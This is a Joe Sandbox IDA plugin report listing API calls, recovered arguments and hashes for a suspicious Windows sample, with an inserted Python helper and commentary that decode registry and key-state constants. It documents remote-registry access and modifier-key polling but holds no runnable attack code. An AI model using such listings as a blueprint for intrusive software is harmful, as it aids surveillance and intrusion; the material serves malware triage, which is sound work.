• Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
APIs
• StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• CoTaskMemFree.OLE32(?,00000000), ref: 00458335
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
• RegQueryValueExW.ADVAPI32 ref: 00458381
• CLSIDFromString.OLE32(00000000,?), ref: 004583AF
• RegQueryValueExW.ADVAPI32 ref: 004583E8
• LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
  • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
• RegCloseKey.ADVAPI32(?), ref: 004584BA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
• String ID: Version$\TypeLib$interface\
• API String ID: 656856066-939221531
• Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
• Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
• Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
• Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
• __swprintf.LIBCMT ref: 0045E6EE
• _printf.LIBCMT ref: 0045E7A9
• _printf.LIBCMT ref: 0045E7D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: LoadString_printf$__swprintf_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 3590180749-2354261254
• Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
• Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
• Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
• Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __swprintf_wcscpy$__i64tow__itow
• String ID: %.15g$0x%p$False$True
• API String ID: 3038501623-2263619337
• Opcode ID: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
• Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
• Opcode Fuzzy Hash: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
• Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • _memset.LIBCMT ref: 00458194
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 2255324689-22481851
                                                                                                                                    • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                    • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                    • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                    • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                    • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                    • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                    • String ID: ($interface$interface\
                                                                                                                                    • API String ID: 2231185022-3327702407
                                                                                                                                    • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                    • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                    • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                    • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                    • API String ID: 2691793716-3771769585
                                                                                                                                    • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                                    • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                    • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                                    • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                                      • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                                      • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                                    • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                                    • __lock.LIBCMT ref: 00416B8A
                                                                                                                                    • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                                    • __lock.LIBCMT ref: 00416BAB
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1028249917-2843748187
                                                                                                                                    • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                    • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                                    • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                    • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                    • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                    • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                    • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                    • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1350042424-0
                                                                                                                                    • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                    • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                    • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                    • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                    • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                    • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                    • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
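The API rows above are raw output of the Joe Sandbox IDA plugin: each row names the imported function, the module it resolves to, the argument values the plugin recovered at the call site, and the address of the call. Values such as 80000000, 00020019 and 000000A0 are Win32 constants, and reading them by hand is where triage errors creep in. The following Python helper is an added triage aid, not part of the Joe Sandbox report or of the sample; it parses rows in this format and decodes the predefined registry root handles, the registry access mask and the virtual-key codes used by the registry and keyboard-state functions listed on this page. The sample rows are copied from the listings above (the remote-registry function at 004581D6, the HKCR\interface enumeration at 00458513 and the key-state polling at 00453C0D); the function names `decode_rows` and `polled_keys` are my own.

```python
"""Decode Joe Sandbox 'APIs' rows into readable Win32 constants.

Added triage helper, not part of the Joe Sandbox report or the analysed sample.
Input rows look like:
    • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
"""
import re
from dataclasses import dataclass, field

# Predefined registry root handles (winreg.h).
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}

# Registry access-right bits (winnt.h), lowest bit first.
KEY_RIGHTS = [
    (0x00001, "KEY_QUERY_VALUE"),
    (0x00002, "KEY_SET_VALUE"),
    (0x00004, "KEY_CREATE_SUB_KEY"),
    (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00010, "KEY_NOTIFY"),
    (0x00020, "KEY_CREATE_LINK"),
    (0x00100, "KEY_WOW64_64KEY"),
    (0x00200, "KEY_WOW64_32KEY"),
    (0x10000, "DELETE"),
    (0x20000, "STANDARD_RIGHTS_READ"),   # READ_CONTROL
    (0x40000, "WRITE_DAC"),
    (0x80000, "WRITE_OWNER"),
]
# Composite masks the SDK defines from the bits above.
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# Virtual-key codes (winuser.h) relevant to the Get(Async)KeyState rows on this page.
VK_CODES = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT",
    0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}

# Which argument position carries a root handle / access mask / virtual key.
REG_ROOT_ARG = {"RegOpenKeyExW": 0, "RegOpenKeyExA": 0, "RegCreateKeyExW": 0,
                "RegConnectRegistryW": 1, "RegConnectRegistryA": 1}
REG_MASK_ARG = {"RegOpenKeyExW": 3, "RegOpenKeyExA": 3, "RegCreateKeyExW": 5}
VK_ARG = {"GetAsyncKeyState": 0, "GetKeyState": 0}

ROW_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{1,8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    notes: list = field(default_factory=list)


def as_int(arg):
    """Return the integer value of a hex literal argument, or None for '?' / strings."""
    return int(arg, 16) if HEX_RE.match(arg) else None


def decode_access_mask(mask):
    """Expand a samDesired mask into its named bits, with the SDK composite name if known."""
    bits = [name for bit, name in KEY_RIGHTS if mask & bit]
    leftover = mask & ~sum(bit for bit, _ in KEY_RIGHTS)
    parts = bits + ([f"0x{leftover:X}"] if leftover else [])
    text = "|".join(parts) if parts else "0"
    name = KEY_COMPOSITES.get(mask)
    return f"{name} ({text})" if name else text


def parse_row(line):
    m = ROW_RE.match(line)
    if not m:
        return None  # 'Part of subcall' and CRT rows carry no call-site arguments
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def annotate(call):
    """Attach decoded constants for the argument positions that matter for this API."""
    for table, label, decode in (
        (REG_ROOT_ARG, "hKey", lambda v: HKEY_ROOTS.get(v)),
        (REG_MASK_ARG, "samDesired", decode_access_mask),
        (VK_ARG, "vKey", lambda v: VK_CODES.get(v, f"0x{v:02X}")),
    ):
        idx = table.get(call.api)
        if idx is None or idx >= len(call.args):
            continue
        value = as_int(call.args[idx])
        if value is None:
            continue  # '?' means the plugin could not recover the argument
        text = decode(value)
        if text:
            call.notes.append(f"{label}={text}")
    return call


def decode_rows(lines):
    return [annotate(c) for c in map(parse_row, lines) if c is not None]


def polled_keys(calls):
    """Sorted, de-duplicated virtual-key names read via GetKeyState/GetAsyncKeyState."""
    keys = {n.split("=", 1)[1] for c in calls if c.api in VK_ARG for n in c.notes if n.startswith("vKey=")}
    return sorted(keys)


# Rows copied from the Joe Sandbox listings on this page.
SAMPLE_ROWS = """
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
• RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
• RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
• GetAsyncKeyState.USER32(000000A0), ref: 00453C82
• GetKeyState.USER32(000000A0), ref: 00453C99
• GetAsyncKeyState.USER32(00000011), ref: 00453D07
• GetAsyncKeyState.USER32(00000012), ref: 00453D3F
• GetAsyncKeyState.USER32(0000005B), ref: 00453D77
""".strip().splitlines()

if __name__ == "__main__":
    for call in decode_rows(SAMPLE_ROWS):
        print(f"{call.ref:08X} {call.api:<22} {'; '.join(call.notes)}")
    print("polled keys:", ", ".join(polled_keys(decode_rows(SAMPLE_ROWS))))
```

Two things the decoded view makes explicit. In the function at 004581D6, RegConnectRegistryW targets HKEY_LOCAL_MACHINE on a machine name the plugin could not recover, and together with the \IPC$ string and WNetAddConnection2W in the same function this is a remote-registry lookup of SOFTWARE\Classes\...\CLSID, opened with KEY_READ (0x20019), so it reads but does not write. In the function at 00453C0D, every key polled is a modifier (left and right Shift, Ctrl, Alt and the left Windows key); that is consistent with a hotkey or modifier-state check as much as with keystroke capture, so treat the listing as a pointer to the code at that address rather than as proof of key logging on its own.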
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                                    • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                    • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                    • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                                    • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                    • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
• Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
